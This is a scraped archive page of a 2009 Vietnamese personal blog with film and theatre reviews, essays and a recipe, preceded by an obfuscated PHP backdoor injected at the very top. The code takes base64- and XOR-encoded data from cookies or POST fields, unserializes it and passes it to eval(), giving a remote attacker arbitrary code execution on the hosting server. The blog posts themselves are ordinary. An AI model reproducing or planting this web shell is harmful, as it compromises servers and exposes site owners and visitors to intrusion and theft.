$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> May 2009 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Month: May 2009 (page 1 of 2)

Spring, Summer, Fall, Winter… And Spring



Spring, Summer, Fall, Winter… and Spring là một bộ phim Hàn Quốc được sản xuất vào năm 2003. Phim xoay quanh về một ngôi chùa nằm nổi lênh đênh giữa hồ, được bao bọc chung quanh bởi rừng cây xanh tươi tốt.

Tôi đã từng nghe về bộ phim này một khoảng thời gian trước, nhưng hơi có phần e ngại mỗi khi trong đầu nảy ra ý tưởng xem thử, có lẽ vì phần giới thiệu của nó khiến cho người ta liên tưởng ngay tới một bộ phim đầy màu sắc Phật giáo và triết lí.

Phim này khi xuất hiện ở các chợ bán đĩa lậu tại Sài Gòn, đã được gán cho một cái tên hết sức ngu ngốc là “Bốn mùa tình yêu”, nghe như các phim mì ăn liền giải trí cũng xuất thân từ Hàn Quốc.

Được đạo diễn bởi Kim Ki-duk, tuy nhiên, phim hoàn toàn không thấy xuất hiện những yếu tố vốn bị chỉ trích rất dữ dội như trong các phim trước đây của ông: sự ghê sợ phụ nữ và rất bạo lực. Trái lại, Spring, Summer, Fall, Winter… and Spring là một bức tranh tuyệt đẹp, chậm rãi mà đầy cảm xúc, được điểm xuyến bởi cảnh vật yên bình đến mê người của tự nhiên, xen lẫn những nỗi thổn thức, những tâm tư cả đời người, xuyên suốt nhiều thế hệ.

Tôi không phải là một người hâm mộ điện ảnh. Số lượng phim tôi xem không nhiều. Và trong số không nhiều phim tôi đã từng xem ấy, thì chiếm đa số lại là phim của Tây. Nhưng, có điều ngạc nhiên thay, những phim tôi yêu thích nhất và đánh giá cao nhất lại là các phim có xuất xứ từ châu Á.

Không xem nhiều phim ảnh, kiến thức cũng nông cạn, nhưng tôi vẫn mạo muội đánh giá phim Spring, Summer, Fall, Winter… And Spring xứng đáng được điểm 10.

Kim Ki-duk đã nói về bộ phim như sau:

I intended to portray the joy, anger, sorrow and pleasure of our lives through four seasons and through the life of a monk who lives in a temple on Jusan Pond surrounded only by nature.

Tôi mạn phép không dịch ra tiếng Việt, để cho các bạn có thể hiểu chính xác ý của ông.

Khi người ta quay đầu nhìn lại, mọi thứ đều trôi qua rất nhanh. Cái bánh xe vô lượng của thời gian thật sự rất tàn nhẫn, nó xoay chuyển không ngừng, đập tan cái ước muốn đôi khi xuất hiện của chúng ta là có một giây phút dừng lại, chỉ dừng lại và đứng đó thôi.

Cuộc đời của một con người, như các bạn có thể đoán qua tiêu đề bộ phim, là một vòng tuần hoàn khép kín, lặp đi lặp lại.

Bộ phim bắt đầu bằng mùa Xuân. Cũng là bắt đầu cuộc đời của chú tiểu nọ.

Spring

Cuộc sống của chú tiểu những tháng năm đầu đời này, giống với từ pleasure trong câu nói trên của Kim Ki-duk. Và thật ra luôn là thế, hầu hết trong chúng ta, những năm tháng đẹp đẽ nhất luôn gắn liền với hai chữ “tuổi thơ”. Ở đây, chú tiểu được học những bài học đơn giản và chân thật nhất về thiện – ác. Nụ cười rất tươi của chú khi đùa giỡn, cùng những giọt nước mắt hối hận của tuổi nhỏ trước bài học đầu đời, là điểm nhấn trong mùa Xuân đầy an bình này.

Xuân qua, Hạ tới.
Dĩ nhiên, ai cũng có thể hiểu, Hạ ở đây ứng vào giai đoạn trưởng thành của chú tiểu, và chữ joy trong câu của Kim. Mùa Hạ nóng rực như tâm tình của một chàng trai khi trưởng thành, nhưng cũng thật vui vẻ với những xúc cảm êm đềm thuở ban đầu ấy.
Trong giai đoạn này, chú tiểu của chúng ta đã được nếm cảm xúc mãnh liệt nhất trong đời người: tình yêu.

Tình yêu đẹp nhưng cũng đầy men say của dục vọng.
Cảnh tượng chú tiểu khóc trước tượng Phật khi lần đầu tiên sờ mó cô bạn gái, cảnh tượng hai người ân ái ngay trong phòng cúng Phật, làm tôi liên tưởng tới hai câu

Gió thông đưa kệ tan niềm tục
Hồn bướm mơ tiên lẫn sự đời
(Khái Hưng – Hồn bướm mơ tiên)

Đỏ như anh của một thời trai trẻ và như em của một thuở mê say. Đỏ như cái tình yêu mà vì nó, chú tiểu rời bỏ ngôi chùa đã gắn bó với tuổi thơ của mình, để khăn gói ra đi, bất chấp câu nói của sư phụ vẫn vang vọng bên tai

Desire leads to attachment

Thu sang, đỏ nhoà sắc phong

Cảnh bắt đầu với hình ảnh sư phụ của chú tiểu năm nào, nay đã rất già, tình cờ đọc bài báo viết về đệ tử mình.
Ngày đấy, bỏ qua mọi cấm đoán của lề luật, bỏ qua sự can ngăn của sư thầy, chú tiểu bỏ đi để nếm vị ngọt ngào của ái tình. Và nay, sau khi bị chính ái tình giết chết bằng liều thuốc độc đắng nghét, sau khi phạm vào tội sát nhân vì tự tay giết người vợ bội bạc, chú tiểu lại quay về nơi chốn ngày xưa.
Cảnh xưa còn, người vẫn còn, nhưng liệu người xưa có còn chăng?

Hình ảnh cảm động nhất trong mùa Thu, là cảnh chú tiểu năm nào, dùng chính con dao vấy máu người yêu, hì hục khắc một bài kinh theo yêu cầu của sư cụ, mỗi nét khắc là một lần phá tan sự tức giận trong lòng mình.
Mùa thu bắt đầu bằng anger, và kết thúc bằng sự mong muốn phá bỏ cái anger ấy…
Fall

Đông phủ tuyết trắng xoá

Chú tiểu trở về khi hết án tù. Lúc này, ngôi chùa xưa đã trở nên điêu tàn.
null
Mùa Đông trong phim diễn ra rất nhanh. Giữa cái cảnh tĩnh lặng của tuyết trắng xoá là sự thổn thức cũng trong tĩnh lặng của một bà mẹ khi phải đem vất bỏ đứa con mình, xen vào đó là tiếng khóc xé lòng của đứa nhỏ, khi bò trên mặt hồ đông cứng, cố với tới xác mẹ mình.
Mùa Đông – sự đau thương và mất mát. Liệu có phải là chữ sorrow trong câu của Kim?

… và mùa Xuân

Lại một vòng đời, lại một chu kì, đứa trẻ ngày ấy lại lớn lên, chú tiểu năm xưa đã già đi.
Vẫn ngôi chùa, vẫn mặt hồ, vẫn hai người, nhưng là sự lặp đi lặp lại có nối tiếp của số phận. Tiếng thở dài của chú tiểu năm xưa, hay tiếng cười trong vắt của chú tiểu ngày nay, thứ nào mới đích thực là hình ảnh của thời gian và số phận. Theo tôi, có lẽ là cả hai.

Rồi đây, đứa trẻ bây giờ, sẽ lại viết tiếp câu chuyện Spring, Summer, Fall, Winter… And Spring…

B.l.u.e

p/s:

1 – Main theme ost

2 – tình cờ nhớ tới một truyện ngắn mà tôi thích nhất Thương nhớ Hoàng Lan – Trần Thuỳ Mai

Tôi nghe tiếng thét của nàng vang động cả giấc mơ, nàng nhào xuống rơi thẳng vào không gian mênh mông như chiếc lá lìa cành trước gió.
“Thầy ơi, nếu vào Niết bàn mà phải đạp lên một chiếc lá, Phật có làm không? Xin thầy cho con hay, trời đất nặng hơn hay chiếc lá nặng hơn?”
Thầy nhìn vào mắt tôi:
“Chỉ có con tự trả lời được thôi. Ngày mai con hãy về, cứ nhìn thẳng vào nghiệp duyên mà tự quyết định lòng mình.”

.

Y! 360, O Brother, Where Art Thou?

Yeah, I wanna begin my entry with the sentence borrowed from a song by U2.

These days, in VietNam, one of the most concerned topics is this news

To me, Y! 360 ((http://blog.360.yahoo.com/)) is no longer a place to blog. I have closed it for nearly 3 months. But, from the bottom of my heart (you can say that I’m a crazy man, huh?), it is my memory, and sometimes, another me.

And I think, the sentence above is true with lots of people.

When losing a place to blog is still not a very big problem, because you can do it easily with Facebook (the Note function) ((http://www.facebook.com/)), Wordpess (like me) ((http://www.wordpress.com/)), or Blogger ((https://www.blogger.com/))…, losing your “social” world – although it’s not real – is a total disaster tragedy.

Yahoo was a group of talent people. Now it still is. However, its strategies nowadays go – oh, how pity I am when saying this – to the wrong destinations on the wrong roads. In spite of spending lots of time to improve its very popular Blog Service (Y! 360), Yahoo made people think about the image of a ‘two-timing rouge’ – kicked Y! 360 ass to flirt – not one, but a lot of new girls.

Yahoo had lost hook, line and sinker. It buried one of its new girls (Y! Mash) and had to send its old one (Y! 360) to grave.

Y! Mash

But that is still not something to lay the blame on.

I have to say: Poor Vietnamese users! They provide you two services: Y! Plus ((http://vn.myblog.yahoo.com/)) and Y! Profiles ((http://profiles.yahoo.com/)) and ask you to choose one.

I vote for Y! Profiles.

Y! Profiles

How elegant it is, compare with the ugly and messy Y! Plus. But the question is: who will be the Y! Messenger’s guy?

I can say, almost 100% people using Internet in VietNam like Y! Messenger. And it was very convenient to have your friends’ updates (new entry or new blast) through Y!M.

Update

Those were the days. And of course, with the two new Y!’s blogging platforms, we want to remain those days. But, who – between Y! + and Y! Profiles, will have the honour to marry our little girl Y!M, in order to put on or to strip off her clothes?

Many people want Y! Profiles, for things that I’ve said before. But now, Y! + has just started his own way to steal the girl’s heart. It’s easy to understand when looking at the things that Y! VietNam team has done – ad campaigns, translate into VietNam, create tool to import from Y! 360…

People will use the one in which they have their friends’ new updates right away. So, the little girl chosen guy will be the winner.

Hope that guy will be Y! Profiles.

In this entry, I don’t want to mention about another inconvenient of Y! +: “it is just for Vietnamese”.

The last sentences is: Farewell, my lovely Y!360. Farewell, my memory. Farewell, another me.

B.l.u.e.

The Unforgiven

Anh lấy tên một trong những bài metal kinh điển làm title cho bài viết này, chỉ bởi vì trong bài hát có một câu

What I’ve felt, What I’ve known, Never shined through in what I’ve shown

Các bạn có thể nghe bài hát này ở đây Metallica – The Unforgiven

Anh ngồi uống rượu với vài người bạn. Cả buổi đấy, anh chỉ khựng lại bởi đúng một câu nói, nội dung thì tương tự như câu anh đã quote ở trên.

Anh có những tài lẻ, những ưu điểm để theo đuổi một ai đó dễ dàng. Nhưng mà, trớ trêu thay, những người anh thật sự thương yêu lại rời xa anh, vì không phải những, mà chỉ một điều anh cho là ưu điểm nhất của anh.

Bạn không cần phải biết anh trong dăm mười năm. Bạn cũng không cần phải là tâm giao của anh, hay gặp mặt anh. Bạn chỉ cần ngồi nói chuyện với anh 5′, là bạn có thể cảm nhận (cái này không phải anh tự nhận, nhiều người đã nói), là anh có óc hài hước rất cao.

Anh luôn cười. Khi anh không cười, thì anh hay chọc người khác cười.

Những người con gái mà anh thật sự yêu, ban đầu đều ấn tượng với anh bởi cái-mà-họ-gọi-là tính như trẻ con của anh.

Họ cảm thấy thoải mái khi chat, khi fone, hay khi ngồi nghe anh kể chuyện.

Nhưng chính họ, lại rời xa anh vì lí do đấy.

Các tình yêu của anh (trong quá khứ và cả hiện tại), đã bao giờ các bạn nghĩ rằng nếu anh không vì muốn thấy nụ cười trên môi các bạn, thì anh đóng vai “trẻ con” làm gì?

Các tình yêu của anh (trong quá khứ và cả hiện tại), khi các bạn rời xa anh để chọn một người “chín chắn” hơn anh, các bạn biết anh làm gì không? Bề ngoài anh vẫn chỉ cười, vẫn nói những câu nói đùa, như anh đã làm. Ngoài điều đó ra, anh còn biết làm gì đây?

Làm sao anh trách được các bạn, khi trước đến giờ, người ta vẫn đánh giá một người thông qua cách hành xử bên ngoài.

Những gì anh đã thật sự trải qua, các bạn không thể nào đánh giá hết được đâu. Các bạn cũng sẽ không bao giờ biết được lí do, cả trong mối quan hệ bạn bè, lẫn tình yêu, anh đều chọn như-anh-hiện-tại đâu!

Thế nhé.

B.l.u.e

p/s: nếu bây giờ các bạn gặp anh, anh vẫn đang cười 🙂.

Anh đã mơ về […]

Dạo này có một số bạn lên án anh dữ quá, vu cho anh những thứ mà con người chính trực như anh trước giờ vốn ghét cay ghét đắng, ấy là viết bài chỉ nhằm mục đích tán tỉnh, không thành tâm.

Anh thật, anh buồn lắm.

Tiếc là anh đã lỡ làm tấm gương sáng soi đường của các bạn rồi, anh không thể khóc, chứ giờ đây, từng giọt nước mắt hờn giận vì bị hiểu sai đang chảy trong tim anh [anh vẫn chưa biết tim nằm đâu, mà cứ cho là thế đã].

Các bạn cũng cứ tin là thế nhé.

À, không vòng vo nữa, anh vào chủ đề chính vậy.

Anh là người đàn ông của gia đình, anh vừa nhận ra thế, các bạn à!

Trong nội dung bài này, anh không bàn về những tài năng vô cùng nổi bật của anh – những thứ mà anh biết kể bảy bảy bốn tám, à quên bốn chín ngày cũng không hết, anh chỉ muốn nói tới một vấn đề là anh rất đảm đang. Vâng, rất đảm đang.

Anh cho các bạn dụi mắt vài phút và mời các bạn nghe bài này để thư giãn Tấn Minh – Bức thư tình đầu tiên trước khi đọc tiếp.

Hôm qua anh đi cafe ((Hi-End Sương Nguyệt Ánh)) với bạn Bảo Bảo, bạn Cờ Lau, bé Lam xinh xinh. Bạn Bảo và bạn Cờ Lau gọi Mì Ý Thịt Bò. Mặc dù anh đã ních một bụng đầy ở nhà rồi, nhưng nhìn vẫn thấy thèm. Khi về nhà, anh chợt nảy ra ý nghĩ, người ta làm được, sao mình lại không làm được nhỉ?

Nghĩ là làm, ngay sáng hôm nay, sau khi đi bơi (xin đọc lại post trước để biết con-người-văn-hoá-mới là anh ((http://xanhduong.com/2009/05/con-nguoi-van-hoa-moi/))), anh liền đi mua đủ nguyên liệu để làm món này.

A lê hấp, Mì ý thịt bò, I’m comingggggggggggggg

Đầu tiên, luộc mì với nước lạnh 15′

Luộc Mì

Thịt bò băm nhuyễn (hình như chưa nhuyễn lắm), ướp 2 muỗng canh nước tương

Thịt bò

Cà chua, tiếc là cái máy xay sinh tố nó hư rồi, xay không nhuyễn được, đành tự tay bằm, thiếu nữa thì đi luôn ngón tay rồi hí hí

Cà chua

Vớt mì ra, cho dầu ăn vào

dầu ăn

Bắc chảo dầu nóng lên, bỏ 1 muỗng canh tỏi bằm vào phi cho thơm, cho thịt bò vào xào cùng với cà chua đã xay nhuyễn, cuối cùng cho miếng phomai đầu bò vào

Nấu

Kết quả là đây, anh phải tự khâm phục bản thân anh, giỏi vừa thôi chứ, giỏi gì mà giỏi thế *cười*

Khuyến mãi thêm đĩa rau muống luộc và canh rau muống luộc, 2 món anh thích nhất

Rau muống

Tráng miệng là đây

Vải

Giá mà có thêm

Ken

thì hoàn hảo nhỉ.

Anh đã mơ về […]

Sau này, ngoài việc cứ mỗi chiều khi hoàng hôn xuống, trước căn nhà sơn màu trắng, cửa chớp màu xanh dương, nhìn ra hồ, trên cây piano màu đen tuyền, anh vừa đàn vừa hát những bài tình ca cho vợ anh nghe, thì có lẽ…

…sẽ còn thêm việc, hằng ngày anh nấu ăn cho vợ anh ăn. Hì hì *cười*

Làm vợ anh, nhé!

p/s: Hình chụp bằng điện thoại di động lởm nên không rõ nét được *buồn*..

Câu chuyện về “Con-người-văn-hoá-mới”

[hay còn có tên Ai cho tao làm người lương thiện?]

Mashimaro

Dạo này anh có một thói vui bệnh hoạn (theo lời btkk ((www.secretgarden.ws))) là sáng dậy sớm đi bơi.

Anh nói dậy sớm ở đây, chắc có một số bạn kiếp trước cầm tinh con lợn ỉn lười biếng, trề môi ra và bảo: Em thì ngày nào chả dậy sớm lúc 8h sáng, anh B.l.u.e chỉ tự khen mình là giỏi.

Tộ sư các bạn, dậy sớm ở đây là dậy lúc 5h15 sáng, để có mặt ở hồ bơi lúc 5h45 sáng, phỏng ạ!

Nói chung, đối với thằng mà cả năm qua vẫn giữ lối sinh hoạt lành mạnh là 2h sáng ngủ, 11h trưa dậy, thì việc thay đổi thói quen như trên quả là cực hình.

Anh thì anh chẳng muốn làm thế đâu. Bởi thay đổi thói quen nghĩa là anh phải bỏ qua cơ hội chat với rất nhiều gái xinh. Nhưng với tư cách là ngọn đuốc soi đường, tấm gương chói sáng cho các bạn noi theo, anh đành từ bỏ cái sở thích tao nhã ấy, mà trở thành con người văn hoá mới. Mục đích chính của anh cũng không ngoài việc giúp thế hệ thanh niên Việt Nam ngày nay [đặc biệt là bọn con gái] – vốn rất ngu và lười, có được sự phát triển đúng chuẩn về cả thể chất lẫn tinh thần.

Anh những tưởng thế là đã đủ bệnh hoạn lắm rồi. Té ra anh lầm.

Tối qua, anh còn nảy ra ý định tồi tệ hơn ấy là: sau khi đi bơi về sẽ chạy ngay lên trường học, mà lại học môn “Hệ quản trị cơ sở dữ liệu” nữa chứ.

Nói chung đã là thằng con trai, nói mà không làm được, thì nhục lắm các bạn à. Anh của các bạn xét về độ chai mặt thì chắc không ai bì được, nhưng vẫn ứ thích người ta chê bai mình đâu. Vì thế, bằng mọi giá, anh phải thực hiện được điều mình đã đề ra.

5h15, anh dậy, dưới sự gào thét ầm ĩ của tới ba cái điện thoại di động [hiệu Motorola].
5h45, anh tới hồ bơi.
6h, sau khi gởi đồ, thay đồ, khởi động nóng người, nhìn gái bikini nóng […], anh nhảy ùm xuống hồ.
6h10, trời mưa.

Người vĩ đại như anh thì sợ gì trời mưa, phỏng ạ! Nhưng thằng bạn chí cốt của anh nó buông câu: sét đánh xuống hồ thì sao mày?
Tộ sư nó, run bỏ cha, nhưng anh vẫn cương quyết: Làm gì có chuyện sét đánh xuống hồ được. Chẳng thể nào ông bạn già Thiên Lôi của anh lại đi hại anh.
Nói tới đấy, thì một bác nhìn rất phúc hậu tặc lưỡi: Lên lẹ đi các chàng trai trẻ, mưa to thế này dây điện rơi xuống hồ thì lại chết oan.

Chặc chắc, đối với một huyền thoại như anh, thì chết có gì đâu là sợ, chỉ có điều, chết khi have never been kissed before thì quả thật là bách nhục. Vả lại, anh còn chưa thực hiện lời hứa đánh đàn piano và hát cho bé Châu nghe mà.

Thế là anh leo ngay lên bờ, và ngồi run rẩy ở đó một lúc trước khi xuống thay đồ, bước ra ngoài nằm run rẩy trên ghế đá chờ mưa ngớt.

Ước mơ thành con-người-văn-hoá-mới của anh đã bị tan tành.

Ai cho tao làm người lương thiện?

Và giờ, anh đang ngồi đây, giữa tiếng mưa rơi đập lộp bộp vào cửa kính, bên li cafe sữa đá mama mới pha, văng vẳng bên tai là tiếng các bạn Kamelot thủ thỉ

I will always be with you
I’m the anchor of your sorrow
There’s no end to what I’ll do
Cause I love you, I love you to death

trong bài Kamelot – Love You To Death

Nếu mà anh lúc đó vẫn đang bơi…
Nếu mà bạn Thiên Lôi của anh say rượu đánh nhầm ngay đó…
Hoặc giả, nếu mà sợi dây điện bay bay rớt xuống đó…

…thì có thể, ngay phút giây đó, anh sẽ hát bài này, cho em, Châu à!

B.l.u.e.

Bức thư tình thứ […]

YM

Hôm nay, group “đặc biệt” của anh không phải chỉ có mỗi nick anh.

Bạn anh là Galileo ngày xưa từng phát biểu một câu bất hủ, đưa bạn anh đạt lên tới tầm huyền thoại tựa tựa anh (mặc dù câu này bạn anh phát biểu trong lúc hơi nóng giận, chắc cũng không ý thức mình nói gì đâu, phỏng ạ!) là: Eppur si muove ((Dù sao thì trái đất vẫn quay)).

Anh rồi cũng sẽ phải có ngày thoát ra được tình trạng tồi tệ trong mấy tháng qua.

Anh của các tình yêu từng nghĩ, cách hiệu quả nhất để quên một người là tìm người khác thế vào. Nhưng với một thằng ngu Sinh học tới mức còn không biết tim nằm bên phải hoặc trái như anh, thì gán hình ảnh người khác vào tim bằng niềm tin và hi vọng à?

Khi anh đang hẹn hò với người khác, anh vẫn nhớ [cái hình ảnh ấy].
Khi anh đang, thậm chí còn vượt quá cái gọi là hẹn hò, dĩ nhiên là cũng với người khác, anh vẫn nhớ [và lần này, dĩ nhiên vẫn là cái hình ảnh ấy].

Và vào thời điểm anh ngưng ngay cái việc thay thế hình ảnh đấy, thì “nó” tự đến.

Cái bạn mà anh đang rất thích ấy, anh chẳng biết tại sao anh thích. Nhìn chung, anh không phải thuộc tuýp người hay đào bới hàng trăm ngàn từ trong từ điển để xác định rõ câu: tại sao mình lại thích? Các tình yêu có thể nói anh lười bỏ xừ, trốn tránh câu trả lời… anh đành nhắm mắt chấp nhận hết vậy.

Cái bạn mà anh đang rất thích ấy, anh từng ước cho trai Sài Gòn ngoài anh ra mù hết, mà té ra không phải, có kha khá người theo. Anh chẳng biết anh của các tình yêu có thành công

– What do you want?
– I want a white house… with blue shutters…
– Mm-hmm.
– And a room overlooking the river so I can paint.
– Anything else?
– Yes.
– I want a big old porch that wraps around the entire house.
– We can drink tea…
– Whoa, whoa, whoa…
– and watch the sun go down…
– :”>
– và anh sẽ vừa đàn piano vừa hát cho em nghe

hay không? Anh thậm chí đã dựng mấy thằng bạn bác học hay uống trà bàn luận cùng anh hằng ngày dậy để hỏi câu trên. Câu trả lời ra sao, anh đố các tình yêu biết ấy.

Anh chợt nhớ tới bài rock nổi tiếng của Nightwish – Kiss While Your Lips Are Still Red. Thích thì là thích thế thôi, các bạn ngố à.

B.l.u.e.

Romeo & Juliet

Romeo & Juliet

Anh không thích Shakespeare.
Vì lí do đấy dĩ nhiên anh không thích Romeo & Juliet.

Các bạn hỏi anh nguyên nhân tại sao ư? Anh không hay lấy cái mỡ hỗn độn cảm xúc yêu hay ghét của anh, ngồi tích phân nó ra [nghe có vẻ toán học nhỉ], và nêu đích xác cho các bạn biết từng nhân tố đó là gì. Nhưng lần này ngoại lệ vậy.

E hèm, một chút ghen tị khi mình si tình chẳng kém gì Romeo mà lại không tìm được ai như Juliet, vừa xinh đẹp

O, she doth teach the torches to burn bright!
It seems she hangs upon the cheek of night

lại vừa thuỷ chung

And I will do it without fear or doubt,
To live an unstain’d wife to my sweet love.

Đó cũng có thể là chút mỉa mai, khi thấy thiên hạ đua nhau đọc và tán dương Romeo & Juliet, ca ngợi đấy là thiên tình sử diễm lệ; nhưng hầu như chẳng ai đủ can đảm chọn sống một cách sống và yêu theo cách yêu như thế, hay đã chọn rồi thì cũng không đi được hết con đường mình đã chọn.

Thêm một lí do cá nhân khác, mặc dù cái này anh tự nhận là anh không đúng lắm, đấy là thứ ngôn ngữ trong Romeo & Juliet. Dĩ nhiên, sẽ có những bạn với vốn kiến thức uyên thâm, nhảy vào giảng cho anh bài học về thế nào là ngôn ngữ trong văn, thơ, kịch… cổ. Anh tiếp nhận. Áp dụng cái nhìn của thời đại này đối với những năm của thế kỉ XVI, XVII thì quả là lệch lạc. Nhưng anh vẫn rất không thích ngôn ngữ [mà anh cho là] sáo rỗng ấy, dù cho nó hay, một lần nữa, anh thừa nhận.

Nhưng dĩ nhiên, việc không thích và việc viết cảm nhận, là hai việc hoàn toàn khác nhau. Nhất là khi nó lại đi kèm với suy nghĩ: làm sao cho đáng với số tiền đã bỏ ra mua vé ((150k VNĐ/vé, nghĩa là bằng 10 tô bún bò hằng ngày của anh *cười*)).

Thế nên, bài này của anh, sẽ là cảm nhận về Romeo & Juliet, hay nói chính xác tới từng milimét một là vở kịch Romeo & Juliet, diễn ra tại nhà hát kịch Thành Phố mà anh đã có dịp xem tối hôm qua.

Thông tin về nó thì anh đã tìm cho các bạn ở VietNamNet:
Vở kịch kinh điển Romeo & Juliet của đại văn hào William Shakespeare lần đầu tiên được nhà hát TNT Vương quốc Anh mang sang công diễn tại Việt Nam vào đầu tháng 5 tới.
nghe tên nhà hát cứ như tên sản phẩm của Nobel bạn anh ấy nhỉ?

Ở một đất nước, nơi mà tuy hằng ngày báo đài vẫn nhắc ầm ầm về cụm từ “thời hội nhập”, người dân đã có dịp tiếp xúc nhiều hơn với các tác phẩm văn hoá nghệ thuật đến từ nước ngoài. Bọn trẻ giờ mới lớp 6, lớp 7 đã có thể nhún nhảy theo nhạc của High School Musical, các bạn gái thơ mộng thì hầu hết giờ đang trông lên poster film Twilight treo đầu giường mà ngắm anh Edward Cullen xinh giai của các bạn hàng giờ. Tuy nhiên, những thứ thuộc về nghệ thuật kinh điển (anh xin lỗi, anh không biết dùng từ gì khác, các bạn có gợi ý gì chăng?) thì lại ít được trình chiếu.

Nếu các bạn thật sự quan tâm, thì hẳn không ít thì nhiều, đã vài ba lần các bạn thấy ghen tị với bọn phương Tây mắt xanh mũi lõ, khi nó có thể xem sân khấu kịch Broadway ((http://en.wikipedia.org/wiki/Broadway_musical)) bất cứ khi nào nó muốn (và có suất diễn). Nó có thể hoà mình vào những vở nhạc kịch bất hủ như Les Miserables, Notre-Dame de Paris của Victor Hugo ((http://en.wikipedia.org/wiki/Victor_Hugo)), hay Swan Lake của Peter Ilyich Tchaikovsky ((http://en.wikipedia.org/wiki/Swan_Lake)). Những điều này chúng ta không thể.

Nói thế để các bạn thấy, cơ hội được xem các vở kịch nước ngoài diễn ở sân khấu Việt Nam là không nhiều. Cách đây tầm vài tháng thì là Annie Get Your Gun ((http://en.wikipedia.org/wiki/Annie_Get_Your_Gun)), và giờ đây là Romeo & Juliet. Dù các vở đấy có hay hoặc còn chỗ thiếu sót, thì âu đó cũng là tín hiệu đáng mừng, vì chúng ta có thể có cơ hội để hầu như cảm nhận hoàn toàn tác phẩm – với đúng nghĩa là bản thân của nó.

Romeo & Juliet hôm qua trên sân khấu rất nhẹ nhàng và đơn giản, tựa như một bài thơ sonnet – thể loại thơ tình rất thịnh hành vào những năm cuối thế kỷ 16 ((http://en.wikipedia.org/wiki/Sonnet)). Đạo cụ trên sân khấu chỉ là phông màn, và vài thùng các-tông. Không biết là do nhà hát kịch Thành phố đã tương đối cũ kĩ, nên góp phần ảnh hưởng đến thị giác của anh, hoặc giả là đấy là ý đồ của người dàn dựng vở kịch, mà tông màu của vở kịch cứ trắng – đen, đơn điệu đến nhạt nhoà. Có lẽ ý đồ của nhà hát TNT là khiến khán giả tập trung vào diễn xuất, biểu cảm của các nghệ sĩ đứng trên sân khấu hơn là nhờ vào kĩ xảo chăng?

Tuy nhiên, cái màn hình subtitle có vẻ đã phá vỡ điều đó.

Làm dâu trăm họ luôn khó. Anh biết điều đấy. Anh có thể hiểu một phần ý đồ của nhà hát khi treo lơ lửng cái màn hình để chiếu subtitle là giúp mọi người có thể hiểu được câu chuyện. Nếu không có cái màn hình ấy, anh đồ rằng đa phần mọi người sẽ không nghe và hiểu hoàn toàn những gì đang phát ra từ miệng các nghệ sĩ, bởi ngôn ngữ trong vở kịch toàn tiếng Anh cổ, khó hiểu ngay cả với người Anh bản xứ. Nhưng, cái màn hình ấy cũng tạo hiệu ứng mọi người nhìn lên đấy quá nhiều, khiến đôi khi bỏ sót các góc rất nhỏ trên sân khấu, như đoạn Romeo nằm ngay sát tận cùng bên phải cánh gà, hay vẻ ngượng ngùng của Juliet khi phát hiện Romeo đang núp dưới ban công, nghe hết lời mình thổ lộ…

Nếu là anh, có lẽ anh cũng sẽ không biết giải quyết sao để cho mọi người vừa tập trung vào diễn biến trên sân khấu, vừa hiểu được vở kịch. Thôi thì, đành chấp nhận, vì mình dốt. Nhưng giá như subtitle bằng tiếng Anh thì thú vị hơn nhiều, bởi có những câu thơ sonnet rất khó dịch ra tiếng Việt làm sao để hợp với vần điệu của nó. Và nếu đã bỏ 150k (với điều kiện mua 10 vé), 300k, 500k ra để vào xem một vở kịch, thì, cứ cho là áp đặt chủ quan đi, có lẽ đều kha khá tiếng Anh. Vậy thì việc chiếu subtitle tiếng Việt là không hợp lí lắm.

Nãy giờ nói dông dài về những cái ngoại cảnh, giờ anh đi vào bản thân vở kịch được trình chiếu nhé.

Một tác phẩm nghệ thuật thành công, là phải đi vào lòng người đọc, và ở đó trong một thời gian dài. Nếu xét trên phương diện này, thì có lẽ vở kịch tối qua không đạt được. Những gì đọng lại trong anh sau hơn hai tiếng đồng hồ là khá nhạt nhoà. Điều này anh có thể lí giải đôi chút, có lẽ anh mong đợi gì đó lớn lao hơn ở vở kịch này, một phần khác là anh đã đọc qua bản nguyên tác văn học của Shakespeare.

Khi mà nhắm mắt lại anh cũng có thể kể vanh vách câu chuyện như thế nào, thì cái suy nghĩ chủ quan của anh, sẽ áp đặt những cảnh trên sân khấu chỉ là mô phỏng, cụ thể hoá cho những gì anh đã biết. Đây là một cái dốt của anh. Các bạn chỉ anh làm sao để thoát ra cái suy nghĩ áp đặt đấy với?

Vở kịch nói bằng tiếng Anh, thoại nhiều, nhưng khi người ta chỉ có thể hiểu lơ mơ về những gì các diễn viên đang nói, thì sẽ không có cảm giác mình bị cuốn vào vở kịch. Có lẽ, diễn ở Việt Nam thế này, thì một vở nhạc kịch, với phần nhạc chiếm đa số, sẽ tốt hơn chăng?

Vở kịch trình diễn tối qua không phải không có những điểm lạ và đẹp. Đấy là cách hiện thực hoá hình ảnh thần tình yêu Cupid và tử thần đầy chết chóc, nhưng vẫn chứa vẻ gì đó đầy hư ảo. Các động tác múa của Cupid nhẹ nhàng, chậm chạp, bất kể là các nhân vật chính trên sân khấu đang như thế nào.

